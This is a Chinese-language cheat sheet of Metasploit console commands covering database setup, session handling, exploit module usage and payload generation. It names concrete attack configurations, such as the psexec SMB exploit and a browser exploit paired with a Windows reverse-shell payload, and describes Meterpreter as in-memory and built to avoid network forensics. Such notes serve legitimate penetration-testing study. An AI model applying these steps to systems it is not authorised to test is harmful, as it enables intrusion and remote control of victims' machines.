msfconsole
systemctl start postgresql.service
db_status
db_rebuild_cache#已停用
msfdb reinit
db_connect
db_disconnect
db_nmap
hosts
services -S 445
creds
vulns
db_import
db_export
控制台
set
unset
setg #g --> global
unsetg
save #保存配置信息
run/exploit #生成job
show targets
set targets 34
show payloads
sessions #显示会话
sessions -i [id]
jobs/kill
load/unload/loadpath #插件加载(外部扫描器)
route #指定sessions路由
irb #开发接口
resource #类似运行1.sh resource .rc <==> msfconsole -r r.rc
Exploit模块
Active exploit:
#攻击者主动发送攻击代码,触发被攻击者的漏洞
use exploit/windows/smb/psexec
set payload windows/shell/reverse_tcp
Passive exploit:
#被攻击者客户端存在漏洞,向服务器发送请求,服务器回应攻击代码,导致客户端被攻击
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set payload windows/shell/reverse_tcp
生成payload
generate:
-b #过滤坏字符 encoder
-e #指定encoder
-t #指定输出格式
-s
nop:
next-operation
#无任何操作,cpu直接跳转下一命令
show encoders
Meterpreter
#完全基于内存dll注入
#注入到系统进程
#基于stager建立加密的TLS/1.0通信隧道(避免网络取证)
#服务端使用c语言编写
#客户端基于ruby的全特性api
信息收集
- auxiliary/scanner
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。